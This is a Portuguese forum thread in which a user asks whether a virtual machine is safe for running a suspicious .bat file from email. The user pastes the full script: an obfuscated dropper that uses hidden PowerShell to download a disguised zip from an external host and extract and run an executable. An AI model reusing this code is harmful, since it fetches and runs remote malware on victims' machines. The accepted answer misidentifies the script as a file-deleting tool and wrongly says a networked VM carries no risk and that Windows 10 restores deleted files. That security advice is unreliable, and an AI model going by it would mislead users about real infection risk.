Ir ao conteúdo
  • Cadastre-se

Uma maquina virtual, me deixaria protegido para rodar um virus ".bat"?


Ir à solução Resolvido por RaphiaelGamer,

Posts recomendados

Postado

Recebi em meu email um arquivo .bat, tenho certeza que é virus, gostaria de saber se um computador virtual me deixaria protegido para rodar ele, eu usaria a virtualbox, ou se teria alguma outra para rodar esse arquivo em segurança.

Postado

Bom, primeiro de tudo: É pouco provável que realmente seja um vírus. Geralmente os vírus vem em formato de Trojan. Provavelmente você vai receber um fake virus ou coisa do tipo. O que eu recomendo:

  1. Clique no arquivo .bat com o botão direito, selecione "editar"
  2. Envie o que você encontrar aqui se estiver com dificuldades para entender (provavelmente vai ser um programa simples em batch)
  3. Caso realmente seja um vírus que pode comprometer sua máquina, o uso de uma máquina virtual e desconectanto seu PC da internet vai sim impedir você de receber o vírus na máquina de verdade. Só recomendo tomar cuidado para não confundir as máquinas. Recomendo usar um Windows diferente do que você usa na máquina virtual. Quando eu mexia com malwares eu sempre usava o Windows 7 na minha máquina virtual pra não me confundir.

No mais, é isso. Qualquer dúvida, pode deixar aqui que irei tentar responder com prazer.

 

  • Curtir 1
Postado

@RaphiaelGamer Eu realmente não entendo nada de .bat, entao vou mandar aqui o que aparece no txt, caso voce saiba me dizer o que é, agradeceria muito:

 

 

cls

@echo off

setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION

set len=3

set charpool=0123456789abcdefghijlmnopqrstuvxz

set len_charpool=16

set LDCz_vUeYmsO_nDVoQ_l_o__NNNkYA=

for /L %%b IN (1, 1, %len%) do (

  set /A rnd_index=!RANDOM! * %len_charpool% / 32768

  for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set LDCz_vUeYmsO_nDVoQ_l_o__NNNkYA=!LDCz_vUeYmsO_nDVoQ_l_o__NNNkYA!%%i

)

set RRcMpblBJH=a

set Dn_hhGM_AGFntUo_nMBR=b

set X_ZJtQHCLVuu_MAM=c

set I_O_SOS=d

set PNLDRWlinwgCtfC=e

set CmSC__zPQwU_NmwCe_YeWbBMGduzR=f

set FsF___Zr_v__WD__OR=g

set Gun_VcHl__lsInpQkXRJ_BvURBU=h

set QPHwJQJng_uNCdoJ_TtE=i

set S_zoJQCW_dUjD=j

set ONACxJhHUhMCVOW__dTtaSDVaS_HI=k

set A_fnMum_UzOZaS_DkM=l

set STg_ec_kf__wXS__ZdVTJ_GEK_H=m

set IBXLfu__nhcN_WX=n

set Y_qWV__U_WUQaM=o

set NGuIxG__yuw__jpoIY=p

set M__V_n_QbQBPV=q

set LEFXtS=r

set NIyiMG_KX=s

set VY_PsD=t

set IA__P=u

set T_P_d_xzBuwpol__BI=v

set Xd_wqN_W_yncXiCH=w

set POteBY=x

set XcB_hYU_ITm_IbvWMM_L=y

set GxgFhoUppjoVTR=z

set RPNxIN_EyR_YB=0

set DnnQZz_snvPjqhmmtjTe_F_v_vnXEsU=1

set Vbq_cdU_cmg_i_I=2

set I_sX_iLkXJeRmdPf_SZ_RpEJ_KUsB=3

set QQ_Ns__NKO__kU_byY_pZRdcNFcI=4

set RTydRU__g_g_vqyVgdBfTwKf_P=5

set J_BOlGNxNNGBHF_Uqc_TEh__HVzFtZ=6

set ClAqMaSaKctAdVJZ_JThr_Lp__fDGyT=7

set UW_wiC_AQTCRFE=8

set CnXBXWvVb_OUbO=9

 

set ghdt2d= __-%LDCz_vUeYmsO_nDVoQ_l_o__NNNkYA%

set FsLCyVszloNIbqgOoseT= __-%LDCz_vUeYmsO_nDVoQ_l_o__NNNkYA%

set X_iyft_fp___fN= %FsLCyVszloNIbqgOoseT%

set GvEI__TwySSkF_TRpfZnXqdLYUarIY=%UserProfile%\__-%LDCz_vUeYmsO_nDVoQ_l_o__NNNkYA%

set GvEI__TwySSkF_TRpfZnXqdLYUarIY2=%UserProfile%\Q__xshQRBOI_Tk_x_OPlhVoo_cpM_H

IF EXIST  %GvEI__TwySSkF_TRpfZnXqdLYUarIY2% GOTO FIM

mkdir %GvEI__TwySSkF_TRpfZnXqdLYUarIY2%

IF EXIST  %GvEI__TwySSkF_TRpfZnXqdLYUarIY% GOTO FIM

mkdir %GvEI__TwySSkF_TRpfZnXqdLYUarIY%

set NITZjzU_pWOFquE_OuoSi_MB_vVmVF=%GvEI__TwySSkF_TRpfZnXqdLYUarIY%\%FsLCyVszloNIbqgOoseT%.zip

set FuiwEmPK_qnhRhojx_lfQIbKO_HnEV = "%GvEI__TwySSkF_TRpfZnXqdLYUarIY%\dump.dmp"

set Xc_q_KZBR_wOc_B_WUqSdjGbxAsNbN= "%GvEI__TwySSkF_TRpfZnXqdLYUarIY%\dump2.exe"

 

powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;Start-BitsTransfer 'https://morwiuj445.s3-eu-west-1.amazonaws.com/image2.png' '%NITZjzU_pWOFquE_OuoSi_MB_vVmVF%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%NITZjzU_pWOFquE_OuoSi_MB_vVmVF%');foreach($item in $zip.items()){$shell.Namespace('%GvEI__TwySSkF_TRpfZnXqdLYUarIY%').copyhere($item);};Start-Sleep -s 5 ;rename-item -path ('%GvEI__TwySSkF_TRpfZnXqdLYUarIY%\dump.dmp') -newname ('%FsLCyVszloNIbqgOoseT%.dmp');rename-item -path ('%GvEI__TwySSkF_TRpfZnXqdLYUarIY%\dump2.dmp') -newname ('%FsLCyVszloNIbqgOoseT%.exe');remove-item '%NITZjzU_pWOFquE_OuoSi_MB_vVmVF%';Start-Sleep -s 5 ;Start-Process ('%GvEI__TwySSkF_TRpfZnXqdLYUarIY%\%FsLCyVszloNIbqgOoseT%.exe')}"

 

  • Solução
Postado

Ao que tudo indica nesse código, ele realmente vai tentar remover uma série de itens do seu computador por meio do CMD. É um malware perigoso, mas não chega a ser um vírus. Ele vai corromper, deletar e danificar partes importantes do teu Windows, mas nada que reinstalando o windows não resolva. Se você inserir ele numa máquina virtual, não tem risco nenhum de infectar o seu pc, mesmo com a internet ligada. Você não perderia nada de pessoal, mas teria que reinstalar o Windows.

Se eu não me engano, talvez nem isso, porque o Windows 10 já tem um sistema de reconhecimento de arquivos deletados pelo CMD e realoca eles automaticamente porque eles sabem que existem malwares assim. De todo modo, eu não arriscaria e testaria em uma máquina virtual ou apenas deletaria ele do meu PC mesmo.

  • Obrigado 1
  • 3 meses depois...
Postado

@G7 log E aí testou o .bat?@ricardo_br 

Em 30/11/2020 às 10:59, ricardo_br disse:

Parece vírus mesmo. Se a máquina virtual não estiver rodando na mesma rede que a maquina real acho que não tem chance de passar para a máquina real.

A rede no qual você se refere é a rede de windows mesmo né (compartilhamento de arquivos e impressoras)Ou rede você se refere também a rede do roteador apenas? Tipo estar no mesmo  roteador por cabo ou na mesma rede wifi do roteador?

Crie uma conta ou entre para comentar

Você precisa ser um usuário para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×
×
  • Criar novo...